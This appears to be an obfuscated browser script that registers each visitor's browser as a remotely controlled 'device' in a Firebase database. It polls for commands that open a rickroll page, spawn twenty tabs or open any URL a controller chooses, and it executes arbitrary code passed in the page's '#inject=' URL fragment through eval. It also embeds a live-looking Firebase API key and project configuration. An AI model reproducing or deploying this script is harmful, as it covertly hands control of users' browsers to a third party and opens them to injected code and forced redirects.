(async () => {
  const _0x2082a5 = "dev_" + Math.random().toString(36).substring(2, 10);

  const _0x56b199 = async () => {
    const _0xec927a = document.createElement("script");
    _0xec927a.src = 'https://www.gstatic.com/firebasejs/9.22.2/firebase-app-compat.js';
    document.head.appendChild(_0xec927a);
    await new Promise(res => _0xec927a.onload = res);

    const _0x554a6c = document.createElement("script");
    _0x554a6c.src = "https://www.gstatic.com/firebasejs/9.22.2/firebase-database-compat.js";
    document.head.appendChild(_0x554a6c);
    await new Promise(res => _0x554a6c.onload = res);
  };

  await _0x56b199();

  const _0x1e46fb = {
    apiKey: "AIzaSyD5hBBFtSWYOMIk1ZeLqcUKsAubdok4FWk",
    authDomain: "nebcasino-5aca1.firebaseapp.com",
    databaseURL: "https://nebcasino-5aca1-default-rtdb.firebaseio.com",
    projectId: "nebcasino-5aca1",
    storageBucket: "nebcasino-5aca1.appspot.com",
    messagingSenderId: "907673467348",
    appId: "1:907673467348:web:37b0bcbad757f95845fe41",
  };

  firebase.initializeApp(_0x1e46fb);
  const _0x6df803 = firebase.database();

  const _0x3cd585 = _0x6df803.ref("sessions/public/devices/" + _0x2082a5);

  const updateStatus = () => {
    _0x3cd585.update({
      online: true,
      lastSeen: Date.now(),
    });
  };

  updateStatus();

  const intervalId = setInterval(updateStatus, 0xea60);

  window.addEventListener("beforeunload", () => {
    clearInterval(intervalId);
    _0x3cd585.update({
      online: false,
      lastSeen: Date.now(),
    });
  });

  _0x3cd585.onDisconnect().update({
    online: false,
    lastSeen: Date.now(),
  });

  _0x3cd585.child("action").on("value", (snapshot) => {
    const val = snapshot.val();
    if (!val) return;

    if (val === "rickroll") {
      window.open("https://www.gifcen.com/wp-content/uploads/2022/11/rick-roll-gif-7.gif", "_blank");
    } else if (val === "tabs") {
      for (let i = 0; i < 20; i++) {
        window.open("https://www.google.com", "_blank");
      }
    } else if (typeof val === "object") {
      if (val.type === "rickroll") {
        window.open("https://www.gifcen.com/wp-content/uploads/2022/11/rick-roll-gif-7.gif", "_blank");
      }
      if (val.type === "injectTab" && val.url) {
        window.open(val.url, "_blank");
      }
    }
  });

  const _0x55983c = location.hash;
  if (_0x55983c.startsWith("#inject=")) {
    try {
      const _0x2568f9 = decodeURIComponent(_0x55983c.slice(8));
      eval(_0x2568f9);
    } catch (e) {
      console.error("Injection error:", e);
    }
  }
})();
